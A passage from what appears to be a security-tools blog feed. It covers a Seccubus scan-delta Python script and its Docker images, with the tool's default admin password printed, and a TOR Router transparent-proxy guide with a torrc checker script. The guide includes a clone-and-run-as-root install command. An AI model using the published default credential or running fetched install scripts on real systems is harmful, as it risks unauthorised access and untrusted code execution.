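identified by (host, port, plugin) and compared on its output text. Sample
findings are constructed.
"""

FINDING_KEY = ("host", "port", "plugin")


def finding_key(finding):
    return tuple(finding[k] for k in FINDING_KEY)


def compute_delta(previous, current):
    """Return {"new": [...], "changed": [...], "unchanged": [...], "gone": [...]}.

    previous: findings of the last judged run; each carries a 'status'
              ('open' or 'non-issue') plus host/port/plugin/output.
    current:  raw findings of the run that just finished (no status yet).
    """
    prev = {finding_key(f): f for f in previous}
    cur = {finding_key(f): f for f in current}
    delta = {"new": [], "changed": [], "unchanged": [], "gone": []}
    for key, f in cur.items():
        old = prev.get(key)
        if old is None:
            delta["new"].append({**f, "status": "unjudged"})
        elif old["output"] != f["output"]:
            # Output changed: the earlier judgement no longer applies, but keep it for context.
            delta["changed"].append({**f, "status": "unjudged", "previous_status": old["status"]})
        else:
            delta["unchanged"].append({**f, "status": old["status"]})  # carry judgement forward
    for key, old in prev.items():
        if key not in cur:
            delta["gone"].append({**old, "status": "gone"})
    return delta


def needs_judgement(delta):
    """Only new findings and findings whose output changed need an analyst's attention."""
    return delta["new"] + delta["changed"]


# Constructed previous run, already judged by an analyst.
PREVIOUS_RUN = [
    {"host": "10.0.0.5", "port": "443/tcp", "plugin": "ssl-weak-cipher",
     "output": "TLS_RSA_WITH_3DES_EDE_CBC_SHA accepted", "status": "open"},
    {"host": "10.0.0.5", "port": "22/tcp", "plugin": "ssh-banner",
     "output": "SSH-2.0-OpenSSH_7.9", "status": "non-issue"},
    {"host": "10.0.0.7", "port": "80/tcp", "plugin": "http-server-header",
     "output": "Server: Apache", "status": "non-issue"},
]

# Constructed current run: one unchanged, one changed, one new; 10.0.0.7 is gone.
CURRENT_RUN = [
    {"host": "10.0.0.5", "port": "443/tcp", "plugin": "ssl-weak-cipher",
     "output": "TLS_RSA_WITH_3DES_EDE_CBC_SHA accepted"},
    {"host": "10.0.0.5", "port": "22/tcp", "plugin": "ssh-banner",
     "output": "SSH-2.0-OpenSSH_8.4"},
    {"host": "10.0.0.9", "port": "25/tcp", "plugin": "smtp-open-relay",
     "output": "relay accepted for external recipient"},
]

if __name__ == "__main__":
    delta = compute_delta(PREVIOUS_RUN, CURRENT_RUN)
    for bucket, items in delta.items():
        print(bucket, [finding_key(f) for f in items])
    print("to judge:", len(needs_judgement(delta)))
```

Comparing on the full output text is deliberately strict: a banner that changes from OpenSSH_7.9 to OpenSSH_8.4 re-enters the queue even though it was a non-issue before, which is the behaviour the post describes, and the previous judgement is kept alongside so the analyst can confirm it quickly.<br />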
Seccubus 2.x is the only actively developed and maintained branch and all support for Seccubus V1 has officially been dropped.<br />
<br />
<b>Seccubus V2 works with the following scanners:</b><br />
<ul style="text-align: left;">
<li>Nessus</li>
<li>OpenVAS</li>
<li>Skipfish</li>
<li>Medusa (local and remote)</li>
<li>Nikto (local and remote)</li>
<li>NMap (local and remote)</li>
<li>OWASP-ZAP (local and remote)</li>
<li>SSLyze</li>
<li>Medusa</li>
<li>Qualys SSL labs</li>
<li>testssl.sh (local and remote)</li>
</ul>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Docker</span></h3>
Available images.<br />
<br />
<table style="text-align: left;">
<tbody>
<tr><th>Image name</th><th>Purpose</th></tr>
<tr><td><a href="https://microbadger.com/images/seccubus/seccubus" target="_blank">seccubus</a></td><td>Run a full Seccubus stack in a single container</td></tr>
<tr><td><a href="https://microbadger.com/images/seccubus/seccubus-front" target="_blank">seccubus-front</a></td><td>Serving just the front end HTML, JavaScript and CSS</td></tr>
<tr><td><a href="https://microbadger.com/images/seccubus/seccubus-web" target="_blank">seccubus-web</a></td><td>Serving front end code and API simultaneously</td></tr>
<tr><td><a href="https://microbadger.com/images/seccubus/seccubus-api" target="_blank">seccubus-api</a></td><td>Serving just the API</td></tr>
<tr><td><a href="https://microbadger.com/images/seccubus/seccubus-perl" target="_blank">seccubus-perl</a></td><td>Running command line scripts, e.g. to scan</td></tr>
<tr><td><a href="https://microbadger.com/images/seccubus/seccubus-cron" target="_blank">seccubus-cron</a></td><td>Running the cron daemon to execute scans</td></tr>
</tbody>
</table>
<br />
Information about the docker containers is <a href="https://github.com/seccubus/seccubus/blob/master/README-docker.md" target="_blank">here</a><br />
<br />
<b>Default password, changing it.</b><br />
<br />
After installation the default username and password for seccubus is:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">admin / GiveMeVulns!</span><br />
<br />
It is highly recommended you change this after installation.<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/bin/seccubus_passwd -u admin</span><br />
<br />
<span style="font-size: large;"><a href="https://github.com/seccubus/seccubus" target="_blank">Download Seccubus</a></span><br />
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8244923499446330076.post-66946632665084257042019-06-12T16:30:00.001+05:302019-06-12T16:30:46.408+05:30TOR Router- To Use As Transparent Proxy And Send Traffic Under TOR <div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTCWELYjeeJdRk0gEmKt5e1Z9uajvKq2wJ07UkZiBDqksoCrCbYHvCfqilY2i2YxH4_nC8lMULjhQTwwNb3KvxuODjiRbtrs6Hl5Lzt6BiH9Wb7prX8p-UV8AP8Q-DbZjVY1VgU0ia4hOo/s1600/Tor+Project.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="725" data-original-width="1200" height="386" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTCWELYjeeJdRk0gEmKt5e1Z9uajvKq2wJ07UkZiBDqksoCrCbYHvCfqilY2i2YxH4_nC8lMULjhQTwwNb3KvxuODjiRbtrs6Hl5Lzt6BiH9Wb7prX8p-UV8AP8Q-DbZjVY1VgU0ia4hOo/s640/Tor+Project.png" width="640" /></a></div>
<br />
<b>TOR Router- </b>A tool that allows you to make TOR your default gateway and send all internet connections through TOR (as a transparent proxy) for increased privacy/anonymity, without extra unnecessary code.<br />
<br />
Tor Router allows you to use TOR as a transparent proxy and send all your traffic through TOR, INCLUDING DNS REQUESTS. All you need is a system using systemd (if you want to use the service) and tor.<br />
<br />
TOR Router doesn't touch system files the way other tools for routing your traffic do. There is no need to move files around to route traffic, and moving files is a bad idea, since a failure in the script/tool can break your system's connectivity without you knowing what has happened.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Script to install on distros using SystemD only</span></h3>
If you are using BlackArch Linux <span style="color: blue;">(https://blackarch.org)</span> you can install the script from the repos using the following command:<br />
<span style="background-color: #f3f3f3; color: #38761d; font-family: Courier New, Courier, monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #38761d; font-family: Courier New, Courier, monospace;"># pacman -S tor-router</span><br />
<br />
<b>To install from source:</b><br />
<br />
Note that you need BASH, not sh<br />
<br />
<span style="background-color: #f3f3f3; color: #38761d; font-family: Courier New, Courier, monospace;">~$ git clone https://github.com/edu4rdshl/tor-router.git && cd ./tor-router && sudo bash install.sh</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Usage</span></h3>
On distros using systemd, you should consider using the install.sh script; in any case, the process to install/configure tor-router manually is described here.<br />
<br />
<b>The script requires root privileges</b><br />
<br />
1. Open a terminal and clone the script using the following command:<br />
<span style="background-color: #f3f3f3; color: #38761d; font-family: Courier New, Courier, monospace;">~$ git clone https://github.com/edu4rdshl/tor-router.git && cd tor-router/files</span><br />
<br />
2. Put the following lines at the end of /etc/tor/torrc<br />
<span style="background-color: #f3f3f3; color: #38761d; font-family: Courier New, Courier, monospace;"># Setting up TOR transparent proxy for tor-router</span><br />
<span style="background-color: #f3f3f3; color: #38761d; font-family: Courier New, Courier, monospace;">VirtualAddrNetwork 10.192.0.0/10</span><br />
<span style="background-color: #f3f3f3; color: #38761d; font-family: Courier New, Courier, monospace;">AutomapHostsOnResolve 1</span><br />
<span style="background-color: #f3f3f3; color: #38761d; font-family: Courier New, Courier, monospace;">TransPort 9040</span><br />
<span style="background-color: #f3f3f3; color: #38761d; font-family: Courier New, Courier, monospace;">DNSPort 5353</span><br />
<br />
3. Restart the tor service<br />
4. Execute the tor-router script as root<br />
<span style="background-color: #f3f3f3; color: #38761d; font-family: Courier New, Courier, monospace;"># sudo ./tor-router</span><br />
<br />
5. Now all your traffic goes through TOR. You can check that at the following pages: <span style="color: blue;">https://check.torproject.org</span>, and for DNS tests: <span style="color: blue;">https://dnsleaktest.com</span><br />
<br />
6. To run the script automatically, add it to the system autostart scripts according to the init system you are using; for systemd there is a .service file in the files folder.<br />
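A check for the torrc lines from step 2, as an added example in Python (this is not part of tor-router): it parses a torrc, reports any of the four transparent-proxy settings that are missing or carry a different value, and is meant to be run against /etc/tor/torrc before restarting tor in step 3, so that tor is actually listening on the TransPort and DNSPort the redirect depends on. The sample torrc texts are constructed; the second one leaves out DNSPort, the case where tor would not be listening for the redirected DNS queries.<br />

```python
"""Check a torrc for the transparent-proxy settings tor-router relies on.

Added example, not part of tor-router: parses torrc text (one `Key Value`
per line, `#` starts a comment, option names are case-insensitive) and
reports which of the settings the post asks for are missing or differ.
"""
from typing import Dict, List

# Values the post says to append to /etc/tor/torrc.
REQUIRED = {
    "VirtualAddrNetwork": "10.192.0.0/10",
    "AutomapHostsOnResolve": "1",
    "TransPort": "9040",
    "DNSPort": "5353",
}


def parse_torrc(text: str) -> Dict[str, List[str]]:
    """Return lower-cased option name -> list of values (options may repeat)."""
    options: Dict[str, List[str]] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        options.setdefault(key, []).append(value)
    return options


def check_transparent_proxy(text: str) -> List[str]:
    """List human-readable problems; an empty list means the config is complete.

    Only the first token of a value is compared, so a line such as
    `TransPort 9040 IsolateDestAddr` still satisfies the TransPort check.
    """
    options = parse_torrc(text)
    problems: List[str] = []
    for key, expected in REQUIRED.items():
        values = options.get(key.lower())
        if values is None:
            problems.append(f"{key} is missing (expected '{expected}')")
        elif not any(v.split()[:1] == [expected] for v in values):
            problems.append(f"{key} is '{values[-1]}', expected '{expected}'")
    return problems


# Constructed sample: the lines from the post appended to a minimal torrc.
GOOD_TORRC = """\
# Minimal torrc
SocksPort 9050
# Setting up TOR transparent proxy for tor-router
VirtualAddrNetwork 10.192.0.0/10
AutomapHostsOnResolve 1
TransPort 9040 IsolateDestAddr
DNSPort 5353
"""

# Constructed sample with DNSPort left out: tor has no DNS listener for the redirect.
NO_DNSPORT_TORRC = """\
SocksPort 9050
VirtualAddrNetwork 10.192.0.0/10
AutomapHostsOnResolve 1
TransPort 9040
"""

if __name__ == "__main__":
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else "/etc/tor/torrc"
    with open(path, encoding="utf-8") as fh:
        issues = check_transparent_proxy(fh.read())
    print("\n".join(issues) if issues else f"{path}: transparent proxy settings complete")
```

Run it as <span style="background-color: #f3f3f3; color: #38761d; font-family: Courier New, Courier, monospace;">python3 check_torrc.py /etc/tor/torrc</span> (the file name is an assumption) after editing the file; a non-empty report means step 3 would restart tor without the settings the redirect needs.<br />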
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Uninstalling/Stopping</span></h3>
Delete the tor-router configuration lines in /etc/tor/torrc, disable the tor-router.service using systemctl (if you used the install.sh script), remove /usr/bin/tor-router, /etc/systemd/system/tor-router.service and restart your computer.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Proof of concept</span></h3>
After running the script, follow these steps to ensure that everything is working as expected:<br />
<br />
<b>IP hidden and TOR network configured: </b><br />
Visit <a href="https://check.torproject.org/" target="_blank">https://check.torproject.org</a>, you should see a message like this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwdSBRov5WnI6tRRwGcBKErjtiavTknwWUurnnkJ-Ugr0fX7H404BqaG_V-DrjPJoqZMZPiSb8x2z0l01Vh8o0Hekb1bbmX81SgJv3B7klYszGKf_WmOWgtPt0ch6Z9qckhyOUOFKvGm1j/s1600/Tor+Router+POC.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="541" data-original-width="1360" height="254" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwdSBRov5WnI6tRRwGcBKErjtiavTknwWUurnnkJ-Ugr0fX7H404BqaG_V-DrjPJoqZMZPiSb8x2z0l01Vh8o0Hekb1bbmX81SgJv3B7klYszGKf_WmOWgtPt0ch6Z9qckhyOUOFKvGm1j/s640/Tor+Router+POC.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Checking DNS Leaks: </b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Visit <a href="https://dnsleaktest.com/" target="_blank">https://dnsleaktest.com</a> and run an extended test to see which DNS servers you are using. You should get something like this:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4uc1uooxomi0k4VJqu6cG6-IRhpkzcSOibqAmWlVcv24yILV-dwaMzRHw5d-T94da_hBkYNbwGldF-O_WHoE4MNO9HGaHGerguGbnnlDx6WJehAXXIuJWQBAKBRKJkUPZJ8J3T_SSnt9j/s1600/DNS+Test.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="560" data-original-width="1365" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4uc1uooxomi0k4VJqu6cG6-IRhpkzcSOibqAmWlVcv24yILV-dwaMzRHw5d-T94da_hBkYNbwGldF-O_WHoE4MNO9HGaHGerguGbnnlDx6WJehAXXIuJWQBAKBRKJkUPZJ8J3T_SSnt9j/s640/DNS+Test.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<h3 style="text-align: left;">
<span style="color: #073763;">Distros using the script</span></h3>
BlackArch Linux: <a href="https://github.com/BlackArch/blackarch/blob/master/packages/tor-router" target="_blank">https://github.com/BlackArch/blackarch/blob/master/packages/tor-router</a><br />
<br />
<span style="font-size: large;">Download <a href="https://github.com/Edu4rdSHL/tor-router/archive/master.zip" target="_blank">TOR Router</a></span></div>
Unknownnoreply@blogger.com0